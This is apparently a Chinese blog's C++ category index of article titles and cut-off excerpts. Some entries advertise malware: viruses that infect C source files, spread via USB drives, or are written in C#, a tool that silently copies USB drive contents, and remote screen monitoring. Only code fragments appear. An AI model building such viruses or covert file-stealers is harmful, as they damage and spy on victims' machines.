c++
关注
分享
扫一扫
文章平均质量分 80
黑暗行动
足球
乐观
架构设计
展开
-
感染c/c++源程序的病毒
#include #include #include #include main(){ int virus(void); virus(); /*病毒函数*/}int virus(void){ struct ffblk ffblk; FILE *fp,*fp2,*fp3,*fp4; int i,j,len,q,r,do原创 2018-04-25 15:30:00 · 1345 阅读 · 0 评论 -
HOOK专题
HOOK专题目录基本概念 运行机制 钩子类型 作者 基本概念钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。钩子实际上是一个处理消息的程序原创 2018-04-25 15:30:57 · 123 阅读 · 0 评论 -
基于U盘传播的简单病毒
#include #include #include #include #define TIMER 1//计时器 #define WM_FROMC WM_USER+0 //自定义消息 从C盘中启动 #define WM_FROMU WM_USER+1 //自定义消息 从U盘中启动 //function LRESULT CALLBACK Wn原创 2018-04-25 15:30:54 · 658 阅读 · 0 评论 -
U盘大盗 c语言版
看某期《黑客防线》上有介绍编写“U盘小偷”这个盗取U盘内所有文件的程序的文章,反正也没事做,自己也写了一个。文中是用VC++加MFC写的,我用C、API来写,而且名字叫“U盘大盗”,不然怎么会叫DIY呢^_^原理很简单,就是每隔一段时间探测驱动器,发现可移动盘就把里面的内容copy到机器上。几下子就搞定。代码如下,有关函数的可参考MSDN、优快云搜索(还多亏了它呢)。#include "wind原创 2018-04-25 15:30:51 · 1087 阅读 · 0 评论 -
远程屏幕监视
开发环境和功能分析远程屏幕监视作为我自主编写的远程控制软件的一个模块,我将其独立分割出来发布测试,软件要求能实现分屏同时监视远程主机。大体的开发环境是:操作系统:Windows XP SP1开发所用计算机配置:512M内存+P42.4G CPU+800MHZ系统总线环境:Borland C++ Builder 6.0+SUIStyle控件至于功能需求分析,我们一点一点看,这或许是专业开发人员和普通原创 2018-04-25 15:30:48 · 1283 阅读 · 0 评论 -
关于PE可执行文件的修改
在windows 9x、NT、2000下,所有的可执行文件都是基于Microsoft设计的一种新的文件格式Portable Executable File Format(可移植的执行体),即PE格式。有一些时候,我们需要对这些可执行文件进行修改,下面文字试图详细的描述PE文件的格式及对PE格式文件的修改。1、PE文件框架构成DOS MZ headerDOS stubPE headerSection原创 2018-04-25 15:30:42 · 1027 阅读 · 0 评论 -
C++消息API:屏幕抓词地技术完成
屏幕上的文字大都是由gdi32.dll的以下几个函数显示的:TextOutA、TextOutW、ExtTextOutA、ExtTextOutW。实现屏幕抓词的关键就是截获对这些函数的调用,得到程序发给它们的参数。 我的方法有以下三个步骤: 一、得到鼠标的当前位置 通过SetWindowsHookEx实现。 二、向鼠标下的窗口发重画消息,让它调用系统函数重画 通过WindowFr原创 2018-04-25 15:30:40 · 1096 阅读 · 1 评论 -
发布一个用C#写的一个简单.NET病毒
.NET1.1 .NET2.0下编译通过. 编译时加上 /target:winexe 选项 --------------------------------------------------------------------- using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; usin原创 2018-04-25 15:30:25 · 2878 阅读 · 0 评论 -
c++ 基础全介绍(适合初学者)
Windows C 程序设计入门与提高http://download.chinaitlab.com/program/files/13246.htmlc++ 基础全介绍(适合初学者)单片机C语言入门http://download.chinaitlab.com/program/files/12907.htmlC++ 入门基础教程http://download.chinaitlab.com/progra原创 2018-04-25 15:30:06 · 932 阅读 · 0 评论 -
Wininit.ini,文件与病毒
Wininit.ini,文件与病毒 一、Wininit文件工作机制在Windows中,一个可执行文件如果正在运行或某个库文件(*.dll、*.vxd、*.sys等)正在被打开使用,则不能被改写或删除。例如,你不可能在资源管理器中删除Windows的Explorer.exe。而在Windows的GDI界面下,有一些文件一直处于这种状态下,除Explorer.exe外,还有显示驱动程序库文件原创 2018-04-25 15:30:03 · 2850 阅读 · 0 评论 -
CString、TCHAR*、char*转换
CString->LPTSTR的转化可以用函数GetBuff() CString StrInfo="C:\\Windows"; LPTSTR StrTest=StrInfo.GetBuffer(20); strcpy(StrTest,"NewString"); StrInfo.ReleaseBuffer(); MessageBox(StrInfo,"信息提示",MB_OK);CStr原创 2018-04-25 15:31:16 · 149 阅读 · 0 评论